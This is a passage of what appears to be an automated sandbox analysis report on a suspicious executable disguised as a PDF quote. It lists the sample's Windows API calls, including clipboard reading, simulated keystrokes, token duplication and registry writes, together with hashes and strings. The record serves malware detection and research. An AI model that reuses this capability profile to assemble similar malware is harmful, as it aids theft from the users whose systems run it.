                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __getptd_noexit__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2597487223-0
                                                                    • Opcode ID: 0d243acc7e19b25a22250943bc6f7d24a0cdd34ab75d684c78e2eaa7c66b6b27
                                                                    • Instruction ID: d8f8c65a0d30059dc77e226fe061869362d4eb6391097e19c98ca0e48a9efc46
                                                                    • Opcode Fuzzy Hash: 0d243acc7e19b25a22250943bc6f7d24a0cdd34ab75d684c78e2eaa7c66b6b27
                                                                    • Instruction Fuzzy Hash: 9BF0AFB194020AEBDF29BF648D063DE76E1EF00325F449594B82CBA1D1EBB88A51DB51
                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,00F252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E64FDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: 060d75707dc4cb92a0d8a37ac4729b38466fb550115b2a3eaf25ba0b848aab0e
                                                                    • Instruction ID: 6ada981d996a3c2e594a19fb11f63fab792b9d62870d9fce0612c05a01e3907f
                                                                    • Opcode Fuzzy Hash: 060d75707dc4cb92a0d8a37ac4729b38466fb550115b2a3eaf25ba0b848aab0e
                                                                    • Instruction Fuzzy Hash: FFF039B1245712CFCB34AF64E494852BBF1AF04369320AA7EE1DAA2650C731A844DF40
                                                                    APIs
                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E80930
                                                                      • Part of subcall function 00E67D2C: _memmove.LIBCMT ref: 00E67D66
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: LongNamePath_memmove
                                                                    • String ID:
                                                                    • API String ID: 2514874351-0
                                                                    • Opcode ID: 3f55374b657129ebada5bc83462f446c90c221f3e364d8cd45c1013065f52d27
                                                                    • Instruction ID: fa17053da4bc751688495214fb205a3cfb92255a2c69e858206612015795d3fd
                                                                    • Opcode Fuzzy Hash: 3f55374b657129ebada5bc83462f446c90c221f3e364d8cd45c1013065f52d27
                                                                    • Instruction Fuzzy Hash: 22E0CD3694512C5BC720D6589C05FFA77EDDF8D790F0501F5FD4CE7218D9A09C818690
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wfsopen
                                                                    • String ID:
                                                                    • API String ID: 197181222-0
                                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction ID: 6916282d25e551a2f390636ac96a121a613e0fbde34048c8a3108500ff35429d
                                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                    • Instruction Fuzzy Hash: 4AB0927644060C77CE012A82EC02A493B999B507A4F408020FB0C285A2AAB3A6609689
                                                                    APIs
                                                                    • Sleep.KERNELBASE(000001F4), ref: 01AB82B9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1737160151.0000000001AB6000.00000040.00000020.00020000.00000000.sdmp, Offset: 01AB6000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_1ab6000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction ID: 04141fd5e92ff40f2ab4eb4847eaad1b30fddee33ec11ac350ef5861e776fb2c
                                                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                    • Instruction Fuzzy Hash: 97E0E67494020DDFDB00DFB8D5496DE7FB4EF04301F100161FD01D2281D6309D608B62
                                                                    APIs
                                                                      • Part of subcall function 00E62612: GetWindowLongW.USER32(?,000000EB), ref: 00E62623
                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EECBA1
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EECBFF
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EECC40
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EECC6A
                                                                    • SendMessageW.USER32 ref: 00EECC93
                                                                    • _wcsncpy.LIBCMT ref: 00EECCFF
                                                                    • GetKeyState.USER32(00000011), ref: 00EECD20
                                                                    • GetKeyState.USER32(00000009), ref: 00EECD2D
                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EECD43
                                                                    • GetKeyState.USER32(00000010), ref: 00EECD4D
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EECD76
                                                                    • SendMessageW.USER32 ref: 00EECD9D
                                                                    • SendMessageW.USER32(?,00001030,?,00EEB37C), ref: 00EECEA1
                                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EECEB7
                                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EECECA
                                                                    • SetCapture.USER32(?), ref: 00EECED3
                                                                    • ClientToScreen.USER32(?,?), ref: 00EECF38
                                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EECF45
                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EECF5F
                                                                    • ReleaseCapture.USER32 ref: 00EECF6A
                                                                    • GetCursorPos.USER32(?), ref: 00EECFA4
                                                                    • ScreenToClient.USER32(?,?), ref: 00EECFB1
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EED00D
                                                                    • SendMessageW.USER32 ref: 00EED03B
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EED078
                                                                    • SendMessageW.USER32 ref: 00EED0A7
                                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EED0C8
                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EED0D7
                                                                    • GetCursorPos.USER32(?), ref: 00EED0F7
                                                                    • ScreenToClient.USER32(?,?), ref: 00EED104
                                                                    • GetParent.USER32(?), ref: 00EED124
                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00EED18D
                                                                    • SendMessageW.USER32 ref: 00EED1BE
                                                                    • ClientToScreen.USER32(?,?), ref: 00EED21C
                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EED24C
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00EED276
                                                                    • SendMessageW.USER32 ref: 00EED299
                                                                    • ClientToScreen.USER32(?,?), ref: 00EED2EB
                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EED31F
                                                                      • Part of subcall function 00E625DB: GetWindowLongW.USER32(?,000000EB), ref: 00E625EC
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00EED3BB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                    • String ID: @GUI_DRAGID$F
                                                                    • API String ID: 3977979337-4164748364
                                                                    • Opcode ID: b1c1fc9917f994caedcf6f270749e0c8841b5db642a361d0b7f7e1908397a2d0
                                                                    • Instruction ID: f9f5ab2b44d424d6c4ac61877eaf2c250c6c717c310b14e81d74d9e0beabd3bb
                                                                    • Opcode Fuzzy Hash: b1c1fc9917f994caedcf6f270749e0c8841b5db642a361d0b7f7e1908397a2d0
                                                                    • Instruction Fuzzy Hash: 4942BE30204389AFD720CF25C884AAABBF5FF49714F241929F655AB2A1C772DC45DB92
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_memset
                                                                    • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                    • API String ID: 1357608183-2202602582
                                                                    • Opcode ID: d572fac751149d9021573fb036158bcb31fd2bf743444edea57429124a9f0645
                                                                    • Instruction ID: a6da9ac4b513553cd83884630900a2ea83b0fe429bbfe2de2b57df0ac33f8161
                                                                    • Opcode Fuzzy Hash: d572fac751149d9021573fb036158bcb31fd2bf743444edea57429124a9f0645
                                                                    • Instruction Fuzzy Hash: BE93B475A00219DBDB24CFA8D8817EEB7B1FF48314F24916AE959FB291E7709D81CB40
                                                                    APIs
                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00E64A3D
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E9D9BE
                                                                    • IsIconic.USER32(?), ref: 00E9D9C7
                                                                    • ShowWindow.USER32(?,00000009), ref: 00E9D9D4
                                                                    • SetForegroundWindow.USER32(?), ref: 00E9D9DE
                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E9D9F4
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00E9D9FB
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00E9DA07
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9DA18
                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00E9DA20
                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00E9DA28
                                                                    • SetForegroundWindow.USER32(?), ref: 00E9DA2B
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9DA40
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00E9DA4B
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9DA55
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00E9DA5A
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9DA63
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00E9DA68
                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00E9DA72
                                                                    • keybd_event.USER32(00000012,00000000), ref: 00E9DA77
                                                                    • SetForegroundWindow.USER32(?), ref: 00E9DA7A
                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00E9DAA1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 4125248594-2988720461
                                                                    • Opcode ID: f83b2422244a759692ef3cfa7c3bb725d6414b99f361cd0a544f4feaafc0f898
                                                                    • Instruction ID: 95ec231b7dcb972c99ef6b292de6642c52e3de2a215409336c9c20482fd1e179
                                                                    • Opcode Fuzzy Hash: f83b2422244a759692ef3cfa7c3bb725d6414b99f361cd0a544f4feaafc0f898
                                                                    • Instruction Fuzzy Hash: FA316471A4435CBFEF206FA29C89F7F7E6CEB44B90F104025FA04BA1D1C6B15D15AAA0
                                                                    APIs
                                                                      • Part of subcall function 00EB8AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00EB8AED
                                                                      • Part of subcall function 00EB8AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00EB8B1A
                                                                      • Part of subcall function 00EB8AA3: GetLastError.KERNEL32 ref: 00EB8B27
                                                                    • _memset.LIBCMT ref: 00EB867B
                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00EB86CD
                                                                    • CloseHandle.KERNEL32(?), ref: 00EB86DE
                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00EB86F5
                                                                    • GetProcessWindowStation.USER32 ref: 00EB870E
                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00EB8718
                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00EB8732
                                                                      • Part of subcall function 00EB84F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00EB8631), ref: 00EB8508
                                                                      • Part of subcall function 00EB84F3: CloseHandle.KERNEL32(?,?,00EB8631), ref: 00EB851A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                    • String ID: $default$winsta0
                                                                    • API String ID: 2063423040-1027155976
                                                                    • Opcode ID: af45f8a7023271d190825d073c77c0f269c411d282ff261d9faac35a97f88ba5
                                                                    • Instruction ID: 686e9d1d0d1d34411969af5a72830ba83459655b08e6b427052b6817ff2bfd88
                                                                    • Opcode Fuzzy Hash: af45f8a7023271d190825d073c77c0f269c411d282ff261d9faac35a97f88ba5
                                                                    • Instruction Fuzzy Hash: E4817971900249AFDF159FA5EE85AEF7BBCEF04308F545129F918B62A1DB318E04DB60
                                                                    APIs
                                                                    • OpenClipboard.USER32(00EEF910), ref: 00ED40A6
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00ED40B4
                                                                    • GetClipboardData.USER32(0000000D), ref: 00ED40BC
                                                                    • CloseClipboard.USER32 ref: 00ED40C8
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00ED40E4
                                                                    • CloseClipboard.USER32 ref: 00ED40EE
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00ED4103
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00ED4110
                                                                    • GetClipboardData.USER32(00000001), ref: 00ED4118
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00ED4125
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00ED4159
                                                                    • CloseClipboard.USER32 ref: 00ED4269
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                    • String ID:
                                                                    • API String ID: 3222323430-0
                                                                    • Opcode ID: a9e8ba4c70a772a39ad03606bdff71b6a1fd97ff59d1efea901138699cbcb18c
                                                                    • Instruction ID: 3194977df2fcf50c5b923997fbb712dd10585999332c9d381e709c652e2567ae
                                                                    • Opcode Fuzzy Hash: a9e8ba4c70a772a39ad03606bdff71b6a1fd97ff59d1efea901138699cbcb18c
                                                                    • Instruction Fuzzy Hash: 1751D37120434AAFD311AF61EC95F6E77A8EF94B00F00552AF546F62E1DF30D9098B62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00ECC819
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECC86D
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ECC892
                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ECC8A9
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00ECC8D0
                                                                    • __swprintf.LIBCMT ref: 00ECC91C
                                                                    • __swprintf.LIBCMT ref: 00ECC95F
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    • __swprintf.LIBCMT ref: 00ECC9B3
                                                                      • Part of subcall function 00E83818: __woutput_l.LIBCMT ref: 00E83871
                                                                    • __swprintf.LIBCMT ref: 00ECCA01
                                                                      • Part of subcall function 00E83818: __flsbuf.LIBCMT ref: 00E83893
                                                                      • Part of subcall function 00E83818: __flsbuf.LIBCMT ref: 00E838AB
                                                                    • __swprintf.LIBCMT ref: 00ECCA50
                                                                    • __swprintf.LIBCMT ref: 00ECCA9F
                                                                    • __swprintf.LIBCMT ref: 00ECCAEE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                    • API String ID: 3953360268-2428617273
                                                                    • Opcode ID: f94276596e4dd052a5d7dbb6a2b6e0eebb143e1f99aaac46aaccabb37dfe7789
                                                                    • Instruction ID: c7cdf230f81b9d42bc07f3660fb1be28a606229094506d3b7ca53f3fa8dbc66c
                                                                    • Opcode Fuzzy Hash: f94276596e4dd052a5d7dbb6a2b6e0eebb143e1f99aaac46aaccabb37dfe7789
                                                                    • Instruction Fuzzy Hash: 64A181B2448344ABC704EBA0D982DAFB3ECEF94744F40591DF585E7192EB30DA09CB62
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00ECF042
                                                                    • _wcscmp.LIBCMT ref: 00ECF057
                                                                    • _wcscmp.LIBCMT ref: 00ECF06E
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00ECF080
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00ECF09A
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00ECF0B2
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF0BD
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00ECF0D9
                                                                    • _wcscmp.LIBCMT ref: 00ECF100
                                                                    • _wcscmp.LIBCMT ref: 00ECF117
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00ECF129
                                                                    • SetCurrentDirectoryW.KERNEL32(00F18920), ref: 00ECF147
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00ECF151
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF15E
                                                                    • FindClose.KERNEL32(00000000), ref: 00ECF170
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1803514871-438819550
                                                                    • Opcode ID: fc768f60e0a4c8c4d9d7eb7eb90560d39921ffe14d7caef8a56c4a69bba7d8a4
                                                                    • Instruction ID: dae885d57c24eec715458c204ee94035c8d09cd14f3f1faabeb9dd1decf80a54
                                                                    • Opcode Fuzzy Hash: fc768f60e0a4c8c4d9d7eb7eb90560d39921ffe14d7caef8a56c4a69bba7d8a4
                                                                    • Instruction Fuzzy Hash: 0D31F23250124DAEDB10EBB5DC89FEE77AD9F48764F041179F804F21A1EB31DA46CA54
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EE09DE
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EEF910,00000000,?,00000000,?,?), ref: 00EE0A4C
                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EE0A94
                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EE0B1D
                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EE0E3D
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EE0E4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 536824911-966354055
                                                                    • Opcode ID: ed19f9a7b835ebad7ce353cd558d020bc6bd2c8342dd7a4cf6a991f69c7f8803
                                                                    • Instruction ID: 18e6cddd59aceaefd47d21e11c71f4b381260a6b348eddb31e569522e45b2e53
                                                                    • Opcode Fuzzy Hash: ed19f9a7b835ebad7ce353cd558d020bc6bd2c8342dd7a4cf6a991f69c7f8803
                                                                    • Instruction Fuzzy Hash: 1D0281752046459FCB14EF25D891E2AB7E5FF88724F04985DF88AAB362CB70ED41CB81
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00ECF19F
                                                                    • _wcscmp.LIBCMT ref: 00ECF1B4
                                                                    • _wcscmp.LIBCMT ref: 00ECF1CB
